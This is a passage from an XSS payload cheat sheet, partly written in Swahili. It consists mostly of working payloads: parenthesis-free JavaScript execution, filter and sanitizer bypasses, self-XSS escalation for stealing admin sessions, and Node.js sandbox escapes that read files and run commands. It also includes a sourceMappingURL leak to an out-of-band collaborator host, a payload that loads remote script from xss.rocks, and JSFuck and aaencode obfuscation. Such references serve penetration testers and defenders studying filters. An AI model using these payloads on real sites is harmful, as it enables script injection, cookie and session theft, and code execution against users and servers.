log=[];
function funct(){}
for(let i=0;i<=0x10ffff;i++){
try{
eval(`funct${String.fromCodePoint(i)}()`);
log.push(i);
}
catch(e){}
}
console.log(log)
//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279

//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
<img/src/onerror=alert&#65279;(1)>

Javascript ndani ya maoni

//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools request to the indicated sourceMappingURL will be send

//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com

JavaScript bila mabano

// By setting location
window.location='javascript:alert\x281\x29'
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name

// Backtips
// Backtips pass the string as an array of lenght 1
alert`1`

// Backtips + Tagged Templates + call/apply
eval`alert\x281\x29` // This won't work as it will just return the passed array
setTimeout`alert\x281\x29`
eval.call`${'alert\x281\x29'}`
eval.apply`${[`alert\x281\x29`]}`
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`

// To pass several arguments you can use
function btt(){
console.log(arguments);
}
btt`${'arg1'}${'arg2'}${'arg3'}`

//It's possible to construct a function and call it
Function`x${'alert(1337)'}x`

// .replace can use regexes and call a function if something is found
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
"a".replace.call`1${/./}${alert}`
// This happened in the previous example
// Change "this" value of call to "1,"
// match anything with regex /./
// call alert with "1"
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead

// Using Reflect.apply to call any function with any argumnets
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
// Using Reflect.set to call set any value to a variable
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.



// valueOf, toString
// These operations are called when the object is used as a primitive
// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
valueOf=alert;window+''
toString=alert;window+''


// Error handler
window.onerror=eval;throw"=alert\x281\x29";
onerror=eval;throw"=alert\x281\x29";
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
{onerror=eval}throw"=alert(1)" //No ";"
onerror=alert //No ";" using new line
throw 1337
// Error handler + Special unicode separators
eval("onerror=\u2028alert\u2029throw 1337");
// Error handler + Comma separator
// The comma separator goes through the list and returns only the last element
var a = (1,2,3,4,5,6) // a = 6
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
throw onerror=alert,1,1,1,1,1,1337
// optional exception variables inside a catch clause.
try{throw onerror=alert}catch{throw 1}


// Has instance symbol
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.

• https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md
• https://portswigger.net/research/javascript-without-parentheses-using-dommatrix

Kuitwa kwa kazi yoyote (alert)

//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
[]["constructor"]["constructor"]`$${alert()}```
import('data:text/javascript,alert(1)')

//General function executions
`` //Can be use as parenthesis
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>

DOM vulnerabilities

Kuna JS code inayotumia data isiyo salama inayodhibitiwa na attacker kama location.href. Attacker anaweza kutumia hili kutekeleza arbitrary JS code.
Kwa sababu ya upana wa maelezo ya DOM vulnerabilities it was moved to this page:

DOM XSS

Utapata hapo maelezo ya kina ya kile DOM vulnerabilities zilivyo, zinaanzwaje, na jinsi za kuzitumia.
Pia, usisahau kwamba mwishoni mwa chapisho hilo unaweza kupata maelezo kuhusu DOM Clobbering attacks.

Upgrading Self-XSS

Cookie XSS

Ikiwa unaweza kusababisha XSS kwa kutuma payload ndani ya cookie, kawaida hii ni self-XSS. Hata hivyo, ikiwa utapata vulnerable subdomain to XSS, unaweza kutumia XSS hii kuingiza cookie katika domain nzima na hivyo kusababisha cookie XSS kwenye domain kuu au subdomain nyingine (ile zilizo vunyuziwa kwa cookie XSS). Kwa hili unaweza kutumia cookie tossing attack:

Cookie Tossing

You can find a great abuse of this technique in this blog post.

Kumtuma session yako kwa admin

Huenda user anaweza kushiriki profile yake na admin, na ikiwa self XSS iko ndani ya profile ya user na admin akiifungua, atasababisha vulnerability.

Session Mirroring

Ikiwa utapata self XSS na ukurasa wa web una session mirroring for administrators, kwa mfano kuruhusu clients kuuliza msaada na ili admin akupe msaada ataona kile unachoona kwenye session yako lakini kutoka session yake.

Unaweza kumfanya administrator atokee your self XSS na kuiba cookies/session zake.

Other Bypasses

Bypassing sanitization via WASM linear-memory template overwrite

When a web app uses Emscripten/WASM, constant strings (like HTML format stubs) live in writable linear memory. A single in‑WASM overflow (e.g., unchecked memcpy in an edit path) can corrupt adjacent structures and redirect writes to those constants. Overwriting a template such as “

Check the dedicated page with exploitation workflow, DevTools memory helpers, and defenses:

Wasm Linear Memory Template Overwrite Xss

Normalised Unicode

Unaweza kukagua kama reflected values zinafanyiwa unicode normalized kwenye server (au kwenye client side) na kutumia utendakazi huu kupita protections. Find an example here.

PHP FILTER_VALIDATE_EMAIL flag Bypass

"><svg/onload=confirm(1)>"@x.y

Ruby-On-Rails bypass

Kutokana na RoR mass assignment alama za nukuu zinaingizwa ndani ya HTML kisha kizuizi cha nukuu kinakwepwa (bypass) na mashamba ya ziada (onfocus) yanaweza kuongezwa ndani ya tagi.
Form example (from this report), ikiwa utatuma payload:

contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa

Jozi “Key”,“Value” itarudishwa kama ifuatavyo:

{" onfocus=javascript:alert('xss') autofocus a"=>"a"}

Kisha, sifa ya onfocus itaingizwa na XSS itatokea.

Mchanganyiko maalum

<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)

XSS with header injection katika majibu ya 302

Ikiwa ugundua kwamba unaweza inject headers in a 302 Redirect response unaweza kujaribu make the browser execute arbitrary JavaScript. Hii si rahisi kwani modern browsers hazitafsiri HTTP response body ikiwa HTTP response status code ni 302, hivyo payload ya cross-site scripting peke yake haina manufaa.

In this report and this one unaweza kusoma jinsi ya kujaribu several protocols ndani ya the Location header na kuona ikiwa yoyote yao inaruhusu browser kuchunguza na execute XSS payload ndani ya body.
Past known protocols: mailto://, //x:1/, ws://, wss://, empty Location header, resource://.

Herufi, Nambari na Nukta Pekee

Ikiwa unaweza kuainisha the callback ambayo javascript itakayofanya execute, ukiweka kikomo kwa herufi, nambari na nukta. Soma sehemu hii ya chapisho ili kujifunza jinsi ya kutumia vibaya tabia hii.

Valid <script> Content-Types to XSS

(From here) Ikiwa utajaribu kupakia script na content-type kama application/octet-stream, Chrome itatoa hitilafu ifuatayo:

Refused to execute script from ‘https://uploader.c.hc.lc/uploads/xxx’ because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.

Peke za Content-Type zitakazomuwezesha Chrome kuendesha loaded script ni zile zilizo ndani ya const kSupportedJavascriptTypes kutoka https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc

const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
"application/javascript",
"application/x-ecmascript",
"application/x-javascript",
"text/ecmascript",
"text/javascript",
"text/javascript1.0",
"text/javascript1.1",
"text/javascript1.2",
"text/javascript1.3",
"text/javascript1.4",
"text/javascript1.5",
"text/jscript",
"text/livescript",
"text/x-ecmascript",
"text/x-javascript",
};

Aina za Script kwa XSS

(Kutoka here) Basi, ni aina gani zinaweza kutumika kupakia script?

<script type="???"></script>

• module (chaguo-msingi, hakuna cha kuelezea)
• webbundle: Web Bundles ni kipengele kinachokuwezesha kufungasha seti ya data (HTML, CSS, JS…) pamoja katika faili ya .wbn

<script type="webbundle">
{
"source": "https://example.com/dir/subresources.wbn",
"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
}
</script>
The resources are loaded from the source .wbn, not accessed via HTTP

• importmap: Inaruhusu kuboresha sintaksia ya import

<script type="importmap">
{
"imports": {
"moment": "/node_modules/moment/src/moment.js",
"lodash": "/node_modules/lodash-es/lodash.js"
}
}
</script>

<!-- With importmap you can do the following -->
<script>
import moment from "moment"
import { partition } from "lodash"
</script>

Tabia hii ilitumika katika this writeup kuremapa maktaba kwa eval; kuitumia vibaya kunaweza kusababisha XSS.

• speculationrules: Kipengele hiki kimeundwa hasa kutatua baadhi ya matatizo yanayosababishwa na utayarishaji awali (pre-rendering). Inafanya kazi kama ifuatavyo:

<script type="speculationrules">
{
"prerender": [
{ "source": "list", "urls": ["/page/2"], "score": 0.5 },
{
"source": "document",
"if_href_matches": ["https://*.wikipedia.org/**"],
"if_not_selector_matches": [".restricted-section *"],
"score": 0.1
}
]
}
</script>

Web Content-Types kwa XSS

(From here) Aina zifuatazo za content-type zinaweza kutekeleza XSS katika kivinjari zote:

• text/html
• application/xhtml+xml
• application/xml
• text/xml
• image/svg+xml
• text/plain (?? si kwenye orodha lakini nadhani niliona hii katika CTF)
• application/rss+xml (off)
• application/atom+xml (off)

Kwenye kivinjari vingine, Content-Types nyingine zinaweza kutumika kutekeleza JS yoyote, angalia: https://github.com/BlackFan/content-type-research/blob/master/XSS.md

xml Content Type

Ikiwa ukurasa unarudisha content-type ya text/xml, inawezekana kubainisha namespace na kutekeleza JS yoyote:

<xml>
<text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
</xml>

<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->

Mifumo Maalumu ya Ubadilishaji

Wakati kitu kama "some {{template}} data".replace("{{template}}", <user_input>) kinapotumika. Mshambuliaji anaweza kutumia special string replacements kujaribu kupitisha baadhi ya kinga: "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))

Kwa mfano katika this writeup, hili lilitumika ku-escape mnyororo wa JSON ndani ya script na kutekeleza msimbo wowote.

Chrome Cache to XSS

Chrome Cache to XSS

XS Jails Escape

Ikiwa una idadi ndogo tu ya herufi (chars) za kutumia, angalia suluhisho hizi nyingine za kuaminika kwa matatizo ya XSJail:

// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))

// use of with
with(console)log(123)
with(/console.log(1)/index.html)with(this)with(constructor)constructor(source)()
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))

with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))

//Final solution
with(
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
with(this)
with(constructor)
constructor(source)()

// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE

Ikiwa kila kitu ni undefined kabla ya kutekeleza untrusted code (kama katika this writeup) inawezekana kuunda vitu vya manufaa “kutoka kwa chochote” ili kutumia vibaya utekelezaji wa untrusted code yoyote:

• Using import()

// although import "fs" doesn’t work, import('fs') does.
import("fs").then((m) => console.log(m.readFileSync("/flag.txt", "utf8")))

• Kupata require kwa njia isiyo ya moja kwa moja

Kulingana na hii moduli zimezungushiwa na Node.js ndani ya function, kama ifuatavyo:

;(function (exports, require, module, __filename, __dirname) {
// our actual module code
})

Kwa hiyo, ikiwa kutoka kwa module hiyo tunaweza kuita function nyingine, inawezekana kutumia arguments.callee.caller.arguments[1] kutoka kwa function hiyo kufikia require:

;(function () {
return arguments.callee.caller.arguments[1]("fs").readFileSync(
"/flag.txt",
"utf8"
)
})()

Kwa njia sawa na mfano uliopita, inawezekana kutumia mashughulikiaji ya makosa kufikia kifuniko cha module na kupata kazi ya require:

try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = "".constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) =>
structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log("=".repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req("child_process").execSync("id").toString())
}
}
}
trigger()

Obfuscation & Advanced Bypass

• Obfuscations tofauti katika ukurasa mmoja: https://aem1k.com/aurebesh.js/
• https://github.com/aemkei/katakana.js
• https://javascriptobfuscator.herokuapp.com/
• https://skalman.github.io/UglifyJS-online/
• http://www.jsfuck.com/
• JSFuck iliyosofistikika zaidi: https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce
• http://utf-8.jp/public/jjencode.html
• https://utf-8.jp/public/aaencode.html
• https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses

//Katana
<script>
([,ウ,,,,ア]=[]+{}
,[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
</script>

//JJencode
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>

//JSFuck
<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>

//aaencode
ﾟωﾟﾉ = /｀ｍ´）ﾉ ~┻━┻   / /*´∇｀*/["_"]
o = ﾟｰﾟ = _ = 3
c = ﾟΘﾟ = ﾟｰﾟ - ﾟｰﾟ
ﾟДﾟ = ﾟΘﾟ = (o ^ _ ^ o) / (o ^ _ ^ o)
ﾟДﾟ = {
ﾟΘﾟ: "_",
ﾟωﾟﾉ: ((ﾟωﾟﾉ == 3) + "_")[ﾟΘﾟ],
ﾟｰﾟﾉ: (ﾟωﾟﾉ + "_")[o ^ _ ^ (o - ﾟΘﾟ)],
ﾟДﾟﾉ: ((ﾟｰﾟ == 3) + "_")[ﾟｰﾟ],
}
ﾟДﾟ[ﾟΘﾟ] = ((ﾟωﾟﾉ == 3) + "_")[c ^ _ ^ o]
ﾟДﾟ["c"] = (ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ - ﾟΘﾟ]
ﾟДﾟ["o"] = (ﾟДﾟ + "_")[ﾟΘﾟ]
ﾟoﾟ =
ﾟДﾟ["c"] +
ﾟДﾟ["o"] +
(ﾟωﾟﾉ + "_")[ﾟΘﾟ] +
((ﾟωﾟﾉ == 3) + "_")[ﾟｰﾟ] +
(ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
((ﾟｰﾟ == 3) + "_")[ﾟｰﾟ - ﾟΘﾟ] +
ﾟДﾟ["c"] +
(ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
ﾟДﾟ["o"] +
((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ]
ﾟДﾟ["_"] = (o ^ _ ^ o)[ﾟoﾟ][ﾟoﾟ]
ﾟεﾟ =
((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
ﾟДﾟ.ﾟДﾟﾉ +
(ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
((ﾟｰﾟ == 3) + "_")[o ^ _ ^ (o - ﾟΘﾟ)] +
((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
(ﾟωﾟﾉ + "_")[ﾟΘﾟ]
ﾟｰﾟ += ﾟΘﾟ
ﾟДﾟ[ﾟεﾟ] = "\\"
ﾟДﾟ.ﾟΘﾟﾉ = (ﾟДﾟ + ﾟｰﾟ)[o ^ _ ^ (o - ﾟΘﾟ)]
oﾟｰﾟo = (ﾟωﾟﾉ + "_")[c ^ _ ^ o]
ﾟДﾟ[ﾟoﾟ] = '"'
ﾟДﾟ["_"](
ﾟДﾟ["_"](
ﾟεﾟ +
ﾟДﾟ[ﾟoﾟ] +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
ﾟΘﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
(ﾟｰﾟ + ﾟΘﾟ) +
(c ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟｰﾟ +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟΘﾟ +
(c ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
(ﾟｰﾟ + (o ^ _ ^ o)) +
ﾟДﾟ[ﾟεﾟ] +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟｰﾟ +
(c ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟΘﾟ +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
ﾟΘﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
ﾟΘﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) - ﾟΘﾟ) +
(o ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
(o ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟΘﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
(c ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟｰﾟ +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟΘﾟ +
ﾟДﾟ[ﾟoﾟ]
)(ﾟΘﾟ)
)("_")

// It's also possible to execute JS code only with the chars: []`+!${}

